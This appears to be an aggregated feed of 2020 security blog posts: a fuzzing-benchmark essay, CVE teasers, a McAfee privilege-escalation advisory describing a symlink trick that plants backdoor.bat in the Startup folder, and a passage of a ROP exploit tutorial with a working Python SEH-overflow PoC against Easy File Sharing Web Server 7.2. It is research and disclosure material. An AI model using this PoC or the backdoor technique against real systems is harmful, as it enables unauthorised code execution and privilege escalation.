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CVE-2020-1337 – PrintDemon is dead, long live PrintDemon!

By: voidsec
11 August 2020 at 12:52

Banner Image by Sergio Kalisiak TL; DR: I will explain, in details, how to trigger PrintDemon exploit and dissect how I’ve discovered a new 0-day; Microsoft Windows EoP CVE-2020-1337, a bypass of PrintDemon’s recent patch via a Junction Directory (TOCTOU). Contents PrintDemon primer, how the exploit works? PrinterPort WritePrinter Shadow Job File Binary Diffing CVE-2020-1048 […]

The post CVE-2020-1337 – PrintDemon is dead, long live PrintDemon! appeared first on VoidSec.

Some thoughts on fuzzing

11 August 2020 at 07:11


This blog is a bit weird, this is actually a message I posted in response to a fuzzbench issue, but honestly, I think it warranted a blog, even if it’s a bit unpolished!

You can find the discussion at fuzzbench issue tracker #654


I’ve been streaming a lot more regularly on my Twitch! I’ve developed hypervisors for fuzzing, mutators, emulators, and just done a lot of fun fuzzing work on stream. Come on by!

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up. I often will post data and graphs from data as it comes in and I learn!

The blog

Hello again Today!

So, I’d like to address a few things that I’ve thought of a bit more over time and want to emphasize.

Visualizations, and what I’m often looking for in data

When it comes to visualizations, I don’t really mind much which graphs are displayed by default, linear vs logscale, time-based or per-case-based, but they should both be toggleable in the default. I’m not web dev, but having an interactive graph would be pretty nice, allowing for turning on and off of certain lines, zooming in and out, and changing scales/axes. But, I think we’re in agreement here. I personally believe that logscale should be default, and I don’t see how it’s anything but better, unless you only care about seeing where things “flatten out”. But in that case, it’s just as visible in logscale, you just have to be logscale aware.

Here’s an example of typically what I graph when I’m running and tuning a fuzzer. I’m using doing side-by-side comparisons of small fuzzer tweaks, to my prior best runs, and plotting both on a time domain and a fuzz case domain. I’ve included the linear-scale plots just for comparison with the way we currently do things, but I personally never use linear scale as I just find it to be worse in all aspects.


By using a linear scale, we’re unable to see anything about what happens in the fuzzer in the first ~20 min or so. We just see a vertical line. In the log scale we see a lot more which is happening. This graph is comparing a fuzzer which does rand() % 20 rounds of mutation (medium corruption), versus rand % 5 rounds of the same corruption (low corruption). We can see that early on medium corruption has much better properties, as it explores more aggressively. But there’s actually a point where they cross, and this is likely the point where the corruption becomes too great on average in the medium corruption, and ends up “ruining” previously good inputs, dramatically reducing the frequency we see good cases. It’s important to note, that since the medium corruption is a superset of low corruption (eg, there’s a chance to do low corruption), both graphs would eventually converge to the exact same value.

There’s just so much information in this graph that stands out to me. I see that something about medium corruption performs well in the first ~100 seconds. There’s a really good lead at the early few seconds, and it tapers off throughout. This gives me feedback on maybe when and where I should use this level of corruption.

Further, since I have both a fuzz case graph and a time graph, I can see that medium corruption early on actually has better performance than low corruption. Once again, this makes sense, the more corruption, the more likely you are to make a more invalid input which is parsed more shallow. But from the coverage over case, I see that this isn’t a long term thing and eventually the performance seems to converge between the two. It’s important to note, the intersection point of the two lines varies by quite a bit in both the case domain and the time domain. This tells me that even though I just changed the mutator, it has affected the performance, likely due to the depth of the average input in the corpus, really neat!

Example analysis conclusion

I see that medium corruption in this case is giving me about 10x speedup in time-to-same-coverage, and also some performance benefits early on. I should adopt a dynamic corruption model which tunes this corruption amount maybe against time, or ideally, some other metric I could extract from the target or stats. I see that long-term, the low corruption starts to win, and for something that I’d run for a week, I’d much rather run the low corruption.

Even though this program is very simple, these graphs could pretty arbitrary be stretched out to different time axis. If fuzzbench picks a deadline, for example, 1000 seconds, we would never know this about the fuzzer performance. I think this is likely what many fuzzers are now being tuned to, as the benchmarks often are 12/24/72 hour increments. Fuzzers often get some extra blips even deeper in the runs, and it’s really hard to estimate if these crosses would ever occur.

The case for cases

I personally extract most information from graphs which are plotted against number of fuzz cases rather than time. By doing benchmarks in a time domain, you factor in the performance of the fuzzer. This is this ground truth, and what really matters at the end of the day with complete products. But it’s not the ground truth for fuzzers in development. For example, if I wanted to prototype a new mutation strategy for AFL, I would be forced to do it in C, avoid inefficient copies, avoid mallocs, etc. I effectively have to make sure my mutator is at-or-better than existing AFL mutator performance to use benchmarks like this.

When you do development on fuzz cases, you can start to inspect the efficiency of the fuzzer in terms of quality of cases produced. I could prototype a mutator in python for all I care, and see if it performs better than the stock AFL mutators. This allows me to cut corners and spend 1 day trying out a mutator, rather than 1 month making a mutator and then doing complex optimizations to make it work. During early stages of development, I would expect a developer to understand the ramifications of making it faster, and to have a ballpark idea of where it could be if the O(n^3) logic was turned into O(log n), and whether it’s possible.

Often times, the first pass of an attempt is going to be crude, and for no reason other than laziness (and not in a negative way)! There’s a time and a place to polish and optimize a technique, and it’s important that there can be information learned from very preliminary results. Most performance in standard feedback mechanisms and mutation strategies can be solved with a little bit of engineering, and most developers should be able to gauge the best-case big-O for their strategy, even if that’s not the algorithmic complexity of their initial implementation.

Yep, looking at coverage over cases adds nuance, but I think we can handle it. Given most fuzzing tools, especially initial passes, are already so un-optimized, I’m really not worried about any performance differences in AFL/libfuzzer/etc when it comes to single-core performance.


Scaling of performance is really missing from fuzzbench. At every company I’ve worked at, big and small, even for the most simple targets we’re fuzzing we’re running at least ~50-100 cores. I presume (I don’t know for sure) that fuzzbench is comparing single core performance. That’s great, it’s a useful stat and one I often control for, as single-core, coverage/case is often controlled for both scaling and performance, leading to great introspection into the raw logic of the fuzzer.

However, in reality, the scaling of these tools is critical for actual use. If AFL is 20% faster single-core, that’ll likely make it show up at the top of fuzzbench, given relative parity of mutation strategies. That’s great, the performance takes engineering effort and should not be undervalued. In fact, most of my research is focused around making fuzzers fast, I’ve got multiple fuzzers that can handle 10s of billions of fuzz cases per second on a single machine. It’s a lot of work to make these tools scale, much more so than single-core performance, which is often algorithmic fixes.

If AFL is 20% faster single-core, but bottlenecks on fork(), or write(), and thus only scales to 20-30 cores (often where I see AFL really fall apart, on medium size targets, 5-10 cores for small targets). But something like libfuzzer manages things in memory and can scale linearly with as many cores as you throw it, libfuzzer is going to blow away any 20% performance gains seen single-core.

This information is very hard to benchmark. Well, not hard, but costly. Effectively, I’d like to see benchmarks of fuzzers scaled to ~16 cores on a single server, and ~128 cores distributed across at least 4 servers. This benchmarks. A. the possibility the fuzzer can scale in the first place, if it can’t that’s a big hit to real-world usability. B. the possibility it can scale across servers (often, over the network). Things like AFL-over-SMB would have brutal scaling properties here. C. the scalability properties between cores on the same server, and how they transfer over the network.

I find it very unlikely that these fuzzers being benchmarked even remotely have similar scaling properties. AFL struggles to scale even on a single server, even in persistent mode, due to the heavy use of syscalls and blocking IPC every fuzz case (signal(), read(), write(), per case IIRC, ~3-4 syscalls).

Scaling also puts a lot of pressure on infeasible fuzzing strategies proposed in papers. We’ve all seen them, the high-introspection techniques which extract memory, register, taint state from a small program and promise great results. I don’t disagree with the results, the more information you extract, pretty much directly correlates to an increase in coverage/case. But, eventually the data load gets very hard to share between cores, queue between servers, and even just process.

Measuring symbolic

Measuring symbolic was brought up a few times, as it would definitely have a much better coverage/case than a traditional fuzzer. But this nuance can easily be handled by looking at both coverage/case and coverage/time graphs. Learning what works well algorithmicly should drive our engineering efforts to solve problems. While symbolic may have huge performance issues, it’s very likely, that many of the parts of it (eg. taint tracking) can be approximated with lossy algorithms and data capturing, and it’s more about learning where it has strengths and weaknesses. Many of the analyses I’ve done on symbolic largely lead me to vectorized emulation, which allows for highly-compressed, approximated taint tracking, while still getting near-native (or even better) execution speeds.

The case against monolithic fuzzers

Learning what works is important to figure out where to invest our engineering time. Given the quality of code in fuzzing right now (often very poor), there’s a lot of things that I’d hate to see us rule out because our current methodologies do not support them. I really care about my reset times of fuzz cases, (often: the fork() costs), as well as determinism. In a fully deterministic environment, with fast resets, a lot of approximate strategies can be used. Trying to approximate where bytes came from in an input, flipping the bytes because you have a branch target which is interesting, and then smashing those bytes in can give good information about the relation of those bytes to the input. Hell, with fast resets and forking, you can do partial fuzzing where you fork() and snapshot multiple times during a fuzz case, and you can progressively fuzz “from” different points in the parser. This works especially well for protocols where you can snapshot at each packet boundary.

These sorts of techniques and analyses don’t really work when we have monolithic fuzzers. The performance of existing fuzzers is often quite poor (AFL fork(), etc), or does not support partial execution (persistent modes, libfuzzer, etc). This leads to us not being able to even research these techniques. As we keep bolting things onto existing fuzzers and treating them like big blobs, we’ll get further and further from being able to learn the isolated properties of fuzzers and find the best places to apply certain strategies.

Why I don’t care much about fuzzer performance for benchmarking

Reset speed

AFL fork() bottlenecks for me often around 10-20k execs/sec on a single core, and about 40-50k on the whole system, even with 96C/192T systems. This is largely due to just getting stuck on kernel allocations and locks. Spinning up processes is expensive, and largely out of our control. AFL allows access of the local system and kernel to the fuzz case, thus cases are not deterministic, nor are they isolated (in the case of fuzzing something with lock files). This requires using another abstraction layer like docker, which adds more overhead to the equation. My hypervisors that I use for fuzzing can reset a Windows VM 1 million times per second on a single core, and scale linearly with cores, while being deterministic. Why does this matter? Well, we’re comparing tooling which isn’t even remotely hitting the capabilities of the CPUs, rather they’re bottlenecking on the kernel. These are solvable problems, and thus, as a consumer of good ideas but not tooling, I’m interested in what works well. I can make it go fast myself.


Most fuzzers that we work with now are not deterministic. You cannot expect instruction-for-instruction determinism between cases. This makes it a lot harder to use complex fuzzing strategies which may rely on the results of a prior execution being identical to a future one. This is largely an engineering problem, and can be solved in both system-level and app-level targets.

Mutation performance

The performance of mutators is often not what it can be. For example, honggfuzz used (now fixed, cheers!) temporary allocations during multiple passes. During its mangle_MemSwap it made a copy of the chunk that was to be swapped, performing 3 memcpys and using a temporary allocation. This logic was able to be implemented using a single memcpy and without a dynamic allocation. This is not a criticism of honggfuzz, but more of an important note of how development often occurs. Early prototyping, success, and rare revisiting of what can be changed. What’s my point here? Well, the mutation strategies in many fuzzers may introduce timing properties that are not fundamentally required to have identical behaviors. There’s nothing wrong with this, but it is additional noise which factors into time-based benchmarks. This means a good strategy can be hurt by a bad implementation, or, just a naive one that was done early on. This is noise that I think is big to remove from analysis such that we can try to learn what ideas work, and engineer them later.

Further, I don’t know of any mutational fuzzer which doesn’t mutate in-place. This means the multiple splices and removals from an input must end up memcpy()ing the remainder. This is a very common mutation pass. This means the fuzzer exponentially slows down WRT the input file size. Something we see almost every fuzzer put insane restrictions on (AFL has a fit if you give it anything but a tiny file).

There’s nothing stopping us from making a tree-based fuzzer where a splice adds a node to the tree and updates metadata on other nodes. The input could be serialized once when it’s ready to be consumed, or even better, serialized on-demand, only providing the parts of the file which actually were used during the fuzz case.


Initial input: "foobar", tree is [pointer to "foobar", length 6]
Splice "baz" at 3: [pointer to "foo", length 3][pointer to "baz", length 3][pointer to "bar", length 3]
Program read()s 3 bytes, return "foo" without serializing the rest
Program crashes, tree can be saved or even just what has read can be saved

In this, the cost is N updates to some basic metadata, where N is the number of mutations performed on that input (often 5-10). On a new fuzz case, you start with an initial input in one node of the tree, and you can once again split it up as needed. Pretty much no memcpys() need to be performed, nor allocations, as the input can be extended such that in-memory it’s “foobarbaz”, but the metadata describes that the “baz” should come between “foo”, and “bar”.

Restructuring the way we do mutations like this allows us to probably easily find 10x improvements in mutator performance (read, not overall fuzzer performance). Meaning, I don’t really want the cost of the mutator to be part of the equation, because once again, it’s likely a result of laziness or simplicity. If something really brings a strategy to the table that is excellent, we can likely make it work just as fast (but likely even faster), than existing strategies.

Not to note the value in potentially knowing which mutations were used during prior cases, and you could potentially mutate this tree (eg, change a splice from 5 bytes to 8 bytes, without changing the offset, just changing the node in the mutation tree). This could also be used as a mechanism to dynamically weight mutation strategies based on yields, while still getting a performance gain over the naive implementation.

Performance conclusion

From previous work with fuzzers, most of the reset, overhead, and corruption logic is likely not even within an order of magnitude of the possible performance. Thus, I’m far more interested in figuring out what and where strategies work, as the implementations of them are typically not indicative of their performance.

BUT! I recognize the value in treating them as whole systems. I’m a bit more on the hard-core engineering side of the problem. I’m interested in which strategies work, not which tools. There’s definitely value in knowing which tools will work best, given you don’t have the time to tweak or rebuild them yourself. That being said, I think scaling is much more important here, as I don’t know of really anyone doing single-core fuzzing. The results of these fuzzers at scale is likely dramatically different from single-core, and would put some major pressure on some more theoretical ideas which produce way too much information to consume and handle.

Reconstructing the full picture from data

The data I would like to see fuzzbench give, and I’d give you some massive props for doing it, would be the raw, microsecond-timestamped information for each coverage gained.

This means, every time coverage increases, a new CSV record (or whatever format) is generated, including the time stamp when it was found (to the microsecond), as well as the fuzz iteration ID which indicates how many inputs have been run into the fuzzer. This should also include a unique identifier of the block which was found.

This means, in post, the entire progress of the fuzzer can be reconstructed. Every edge, which edges they were, the times they were found, and the case ID they were on when they were found allows comparing not only the raw “edge count” but also the differences between edges found. It’s crazy that this information is not part of the benchmark, as almost all the fuzzers could be finding nearly the same coverage, but a fuzzer which finds less coverage, but completely unique edges, would be devalued.

This is the firehose of data, but since it’s not collected on an interval, it very quickly turns into almost no data.

Hard problem: What is coverage?

This leads to a really hard problem. How do we compare coverage between tools? Can we safely create a unique block identifier which is universal between all the fuzzers and their targets. I have no idea how fuzzbench solves this (or even if it does). If fuzzbench is relying on the fuzzers to have roughly the same idea of what an edge is, I’d say the results are completely invalid. Having different passes which add different coverage gathering, compare information gathering, could easily affect the graphs. Even just non-determinism in clang (or whatever compiler) would make me uneasy about if afl-clang binaries have identical graph shapes to libfuzzer-clang binaries.

If fuzzbench does solve this problem, I’m curious as to how. I’d anticipate it would be through a coverage pass which is standardized between all targets. If this is the case, are they using the same binaries? If they’re not, are the binaries deterministic, or can the fuzzers affect the benchmark coverage information due to adding their own compiler instrumentation.

Further, if this is the case, it makes it much harder to compare emulators or other tools which gather their own coverage in a unique way. For example, if my emulators, which get coverage for effectively free, had to run an instrumented binary for fuzzbench to get data, it’s not a realistic comparison. My fuzzer would be penalized twice for coverage gathering, even though it doesn’t need the instrumented binary.

Maybe someone solved this problem, and I’m curious what the solution is. TL;DR: Are we actually comparing the same binaries with identical graphs, and is this fair to fuzzers which do not need compile-time instrumentation.

The end

Can’t wait for more discussion. You have been very receptive even when I’m often a bit strongly opinion-ed. I respect that a lot.

Stay cute,


The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also apart of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration tests. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Sometimes they come back: exfiltration through MySQL and CVE-2020-11579

28 July 2020 at 14:18
Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. Like many other vulnerabilities, after reading about this quite-unknown attack technique (1, 2), I could not wait to find a vulnerable software where to practice such unusual dynamic.

McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283)

By: admin
14 July 2020 at 05:37


Assigned CVE: CVE-2020-7283 has been assigned and RedyOps Labs has been publicly acknowledged by the vendor.

Known to Neurosoft’s RedyOps Labs since: 09/03/2020

Exploit Code:

Vendor’s Advisory:!

An Elevation of Privilege (EoP) exists in McAfee Total Protection (MTP) < 16.0.R26 . The latest version we tested is McAfee Total Protection (MTP) 16.0.R23. The exploitation of this EoP , gives the ability to a low privileged user to create a file anywhere in the system. The file is being created with a DACL , which allows any user to edit the file. Because of this, the attacker can create a file with any chosen name.extension and edit it in order to execute the code of his choice.

If the file already exists, it will be overwritten, with an empty file. 

There are many ways to abuse this issue. We chose to create a bat file in the Users Startup folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\backdoor.bat .


Whenever a scan is initiated, the process MMSSHOST.EXE which runs as an NT AUTHORITY\SYSTEM, and without impersonation, creates the file c:\ProgramData\McAfee\MSK\settingsdb.dat .

The permissions which are assigned to this file, allow to the “Authenticated Users” to have full control over the file.

When we first log into the windows system and without performing any actions, the file c:\ProgramData\McAfee\MSK\settingsdb.dat and the files MSK*.dat in the same folder, are not locked (they are not used by any program) and we have the proper permissions in order to delete them.

After we delete these files, we can make “C:\ProgramData\McAfee\MSK\settingsdb.dat”, a symlink to any chosen file.

With the symlink in place, the initiation of a scan will trigger the execution of the MMSSHOST.EXE.

At this very moment, If we initiate a scan, the MMSSHOST.EXE will try to create the file C:\ProgramData\McAfee\MSK\settingsdb.dat , it will follow the symlink and will actually create the file which is pointed by the symlink.

After that, it will set the new permissions to that file, which allows to the “Authenticated Users” to have full control over the newly created file. Most of the times, the newly created file will remain locked and we will not be able to edit it until we reboot. After the reboot, the file is unlocked and we can edit the file and add any contents we like.

Note: Although we exploited the issue by creating symlinks of the files under the path c:\ProgramData\McAfee\MSK\ , the files under the folder c:\ProgramData\McAfee\MPF\ seem to be affected as well.


In order to Exploit the issue, you can use our exploit from our GitHub .

In the following paragraph, a step by step explanation of the Video PoC where we use the exploit is provided.

Video PoC Step By Step

The exploit takes as an argument the file you want to create .

00:00-02:03: We present the environment. We are low privileged users and as we can see by default, the low privileged users cannot create files under the folder C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup . The folder at the moment is empty.

02:03-02:35: We run the exploit and we pass the file we want to create as argument. In this example we pass as argument the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat”. When the exploit instructs us to scan a file, we perform the scan and the file is created.

02:35-03:23: We present the fact that attacker has full access over the file. Moreover, we add the line “notepad.exe”, which is going to execute the notepad.exe in the context of any user which perform a login into the system. This is a bat file, so you can add the code of your choice (for example a reverse shell).

3:23-end: After the exploitation, another user logs into the system. In our example the administrator. The notepad.exe is executed because of the “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat” file.



You can find the exploit code in our GitHub at

RedyOps team

RedyOps team, uses the 0-day exploits produced by Research Labs, before vendor releases any patch. They use it in special engagements and only for specific customers.

You can find RedyOps team at


Discovered 0-days which affect marine sector, are being contacted with the Angel Team. ANGEL has been designed and developed to meet the unique and diverse requirements of the merchant marine sector. It secures the vessel’s business, IoT and crew networks by providing oversight, security threat alerting and control of the vessel’s entire network.

You can find Angel team at


Our 0-days cannot win Illicium. Today’s information technology landscape is threatened by modern adversary security attacks, including 0-day exploits, polymorphic malwares, APTs and targeted attacks. These threats cannot be identified and mitigated using classic detection and prevention technologies; they can mimic valid user activity, do not have a signature, and do not occur in patterns. In response to attackers’ evolution, defenders now have a new kind of weapon in their arsenal: Deception.

You can find Illicium team at


Discovered 0-days are being contacted to the Neutrify team, in order to develop related detection rules. Neutrify is Neurosoft’s 24×7 Security Operations Center, completely dedicated to threats monitoring and attacks detection. Beyond just monitoring, Neutrify offers additional capabilities including advanced forensic analysis and malware reverse engineering to analyze incidents.

You can find Neutrify team at

The post McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283) appeared first on REDYOPS Labs.

Fuzz Week 2020

12 July 2020 at 07:11


Welcome to fuzz week 2020! This week (July 13th - July 17th) I’ll be streaming every day going through some of the very basics of fuzzing all the way to cutting edge research. I want to use this time to talk about some things related to fuzzing, particularly when it comes to benchmarking and comparing fuzzers with each other.


Ha. There’s really no schedule, there is no script, there is no plan, but here’s a rough outline of what I want to cover.

I will be streaming on my Twitch channel at approximately 14:00 PST. But things aren’t really going to be on a strict schedule.

My Twitter is probably the best source of information for when things are about to start.

Everything will be recorded and uploaded to my YouTube.

July 13th

The very basics of fuzzing. We’ll write our own fuzzer and tweak it to improve it. We’ll probably start by writing it in Python, and eventually talk about the performance ramifications and the basics of scaling fuzzers by using threads or multiple processes. We’ll also compare our newly written fuzzer against AFL and see where AFL outperforms it, and also where AFL has some blind spots.

July 14th

Here we’ll cover code coverage. We might get to this sooner, who knows. But we’re going to write our own tooling to gather code coverage information such that we can see not only how easy it is to set up, but how flexible coverage information can be while still proving quite useful!

July 15th-17th

Here we’ll focus mainly on the advanced aspects of fuzzing. While this sounds complex, fuzzing really hasn’t become that complex yet, so follow along! We’ll go through some of the more deep performance properties of fuzzing, mainly focused around snapshot fuzzing.

Once we’ve discussed some basics of performance and snapshot fuzzing, we’ll start talking about the meaningfulness of comparing fuzzers. Namely, the difficulties in comparing fuzzers when they may involve different concepts of what a crash, coverage, or input are. We’ll look at some existing examples of papers which compare fuzzers, and see how well they actually prove their point.


I think it’s important when doing something like this, to make it clear what my existing biases are. I’ve got a few.

  • I think existing fuzzers have some major performance problems and struggle to scale. I consider this to be a high priority as general performance improvements to fuzzing harnesses makes both generic fuzzers (eg. AFL, context-unaware fuzzers) and hand-crafted (targeted) fuzzers better.
  • I don’t think outperforming AFL is impressive. AFL is impressive because it’s got an easy-to-use workflow, which makes it accessible to many different users, broadening the amount of targets it has been used against.
  • I don’t really thinking comparing fuzzers is reasonable.
  • I think it is very easy to over-fit a fuzzer to small programs, or add unrealistic amounts of information extraction from a target under test, in a way that the concepts are not generally applicable to many targets that exceed basic parsers. I think this is where a lot of current research falls.

But… that’s mainly the point of this week. To either find out my biases are wildly incorrect, or to maybe demonstrate why I have some of the biases. So, how will I address some of these (in order of prior bullets)?

  • I’ll compare some of my fuzzers against AFL. We’ll see if we can outperform AFL in terms of raw fuzz cases performed, as well as the results (coverage and crashes).
  • I’ll try to demonstrate that a basic fuzzer with 1/100th the amount of code of AFL is capable of getting much better results, and that it’s really not that hard to write.
  • I’ll propose some techniques that can be used to compare fuzzers, and go through my own personal process of evaluating fuzzers. I’m not trying to get papers, or funding, or anything. I don’t really have an interest in making things look comparatively better. If they perform differently, but have different use cases, I’d rather understand those cases and apply them specifically rather than have a one-shoe-fits-all solution.
  • I’ll go through some instrumentation that I’ve historically added to my fuzzers which give them massive result and coverage boosts, but consume so much information that they cannot meaningfully scale past tiny pieces of code. I’ll go through when these things may actually be useful, as sometimes isolating components is viable. I’ll also go through some existing papers and see what sorts of results are being claimed, and if they actually have general applicability.

Winging it

It’s important to note, nothing here is scheduled. Things may go much faster, slower, or just never happen. That’s the beauty of research. I may be very wrong with some of my biases, and we’ll hopefully correct those. I love being wrong.

I’ve maybe thought of having some fuzzing figureheads pop on the stream for random discussions/conversations/interviews. If this is something that sounds interesting to you, reach out and we can maybe organize it!

Sound fun?

See you there :)

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00


The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

ROP/COP and other code reuse apparatuses are very important mitigation bypass techniques, due to their versatility. Binary exploit mitigations have come a long way since DEP. Notably, mitigations such as CFG, upcoming XFG, ACG, etc. have posed an increased threat to exploit writers as time has gone on. ROP still has been the “Swiss army knife” to keep binary exploits alive. ROP can result in arbitrary write and arbitrary read primitives - as we will see in the upcoming post. Additionally, data only attacks with the implementation of ACG have become crucial. It is possible to perform data only attacks, although expensive from a technical perspective, by writing payloads fully in ROP.

What This Blog Assumes and What This Blog ISN’T

If you are interested in a remote bypass of ASLR and a 64-bit version of bypassing DEP, I suggest reading a previous blog of mine on this topic (although, undoubtedly, there are better blogs on this subject).

This blog will not address ASLR or 64-bit exploitation (read my previous post if that is what you are looking for) - and will be utilizing non-ASLR compiled modules, as well as the x86 __stdcall calling convention (technically an “ASLR bypass”, but in my opinion only an information leak = true ASLR bypasses).

Why are these topics not being addressed? This post aims to focus on a different, less documented approach to executing code with ROP. As such, I find it useful to use the most basic, straightforward example to hopefully help the reader fully understand a concept. I am fully aware that it is 2020 and I am well aware mitigations such as CFG are more common. However, generally the last step in exploitation, no matter HOW many mitigations there are (unless you are performing a data only attack), is bypassing DEP (in user mode or kernel mode). This post aims to address the latter portion of the last sentiment - and expects the reader already has an ASLR bypass primitive and a way to pivot to the stack.

Expediting The Process

The application we will be going after is Easy File Sharing Web Server 7.2, which has a memory corruption vulnerability as a result of an HTTP request.

The offset to SEH is 2563 bytes. Instead of using a pop <reg> pop <reg> ret sequence, as is normally done on a 32-bit SEH exploit, an add esp, <bytes> instruction is used. This will take the stack, where it is currently not controlled by us, and change the address to an address on the stack that we control - and then return into it.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain
crash += struct.pack('<L', 0x90909090)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

Set a breakpoint on the stack pivot of add esp, 0x1004 ; ret with the WinDbg command bp 0x10022869. After sending the exploit POC - we will need to view the contents of the exception handler with the WinDbg command !exchain.

As a breakpoint has already been set on the address inside of SEH, all that is needed to pass the exception is resuming execution with the g command in WinDbg. The breakpoint is hit, and we will step through the instruction of add esp, 0x1004 (t in WinDbg) to take control of the stack.

As a point of contention, we have about 980 bytes to work with.

The Call to WriteProcessMemory()

What is the goal of this method of bypassing DEP? The goal here is to not to dynamically change permissions of memory to make it executable - but to instead write our shellcode, dynamically, to already executable memory.

As we know, when DEP is enabled, memory is either writable or executable - but not both at the same time. The previous sentiment about writing shellcode, via WriteProcessMemory(), to executable memory is a bit contradictory knowing this. If memory is executable, adhering to DEP’s rules, it shouldn’t be writable. WriteProcessMemory() overcomes this by temporarily marking memory pages as RWX while data is being written to a destination - even if that destination doesn’t have writable permissions. After the write succeeds, the memory is then marked again as execute only.

From an adversary’s perspective, this means something. Certain shellcodes employ encoding mechanisms to bypass character filtering. If this is the case, encoded shellcode which is dynamically written to execute only memory will fail when executed. This is due to the encoded shellcode needing to “write itself” over adjacent process memory to decode. Since pages are execute only, and we do not have the WriteProcessMemory() “pass” to write to execute only memory anymore, an access violation will occur. Something to definitely keep in mind.

Let’s take a look at the call to WriteProcessMemory() firstly, to help make sense of all of this (per Microsoft Docs)

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten

Let’s break down the call to WriteProcessMemory() by taking a look at each function argument.

  1. HANDLE hProcess: According to Microsoft Docs, this parameter is a handle to the desired process in which a user wants to write to the process memory. A handle, without going too much into detail, is a “reference” or “index” to an object. Generally, a handle is used as a “proxy” of sorts to access an object (this is especially true in kernel mode, as user mode cannot directly access kernel mode objects). We will look at how to dynamically resolve this parameter with relative ease. Think of this as “don’t talk to me, talk to my assistant”, where the process is the “me” and the handle is the “assistant”.
  2. LPVOID lpBaseAddress: This parameter is a pointer to the base address in which a write is desired. For example, if the region of memory you would like to write to was 0x11223344 - 0x11223355, the argument passed to the function call would be 0x11223344.
  3. LPCVOID lpBuffer: This is a pointer to the buffer that is to be written to the address specified by the lpBaseAddress parameter. This will be the pointer to our shellcode.
  4. SIZE_T nSize: The number of bytes to be written (whatever the size of the shellcode + NOPs, if necessary, will be).
  5. SIZE_T *lpNumberOfBytesWritten: This parameter is similar to the VirtualProtect() parameter lpflOldProtect, which inherits the old permissions of modified memory. However, our parameter inherits the number of bytes written. This will need to be a memory address, within the process space, that is writable.

Preserving a Stack Address

One of the pitfalls of ROP is that stack control is absolutely vital. Why? It is logical actually - each ROP gadget is appended with a ret instruction. ret, from a technical perspective, will take the value pointed to by RSP (or ESP in this case), which will be the next ROP gadget on the stack, and load it into RIP (EIP in this case). Since ROP must be performed on the stack, and due to the dynamic nature of the stack, the virtual memory addresses associated with the stack are also dynamic.

As seen below, when the stack pivot is successfully performed, the virtual address of the stack is 0x029a68dc.

Restarting the application and pivoting to the stack again, the virtual address of the stack is at 0x028068dc.

At first glance, this puts us in a difficult position. Even with knowledge of the base addresses of each module, and their static nature - the stack still seems to change! Although the stack is dynamically being resolved to seemingly “random” and “volatile to the duration of the process” memory - there is a way around this. If we can use a ROP gadget, or set of gadgets, properly - we can dynamically store an address around the stack into a CPU register.

Let’s start our ROP chain by preserving an address near the current stack pointer.

As you may or may not know, the base pointer (EBP) points to the “bottom” of the current stack frame (we will refer to the current stack frame as “the stack”). This means that EBP should be relatively close to ESP. We can validate this in WinDbg by viewing the current state of the CPU registers after the stack pivot.

After parsing the PE with rp++, to enumerate a list of ROP gadgets (you can view how to use rp++ by taking a look at my last ROP blog post) - a nice gadget resides in sqlite3.dll that can help us preserve the address of EBP into another “common” register, which has more useful ROP gadgets as we will see later on, such as EAX.

0x61c05e8c: xchg eax, ebp ; ret  ;  (1 found)

Replace the NOPs in the previous PoC script, under the “Begin ROP chain” comment, with the above address. After firing off the updated PoC, we land on our intended ROP gadget.

After executing the above gadget, EAX is now loaded with an address near the current stack.

Notice that EBP has also been set to 0, due to the ROP gadget. This will come into play shortly.

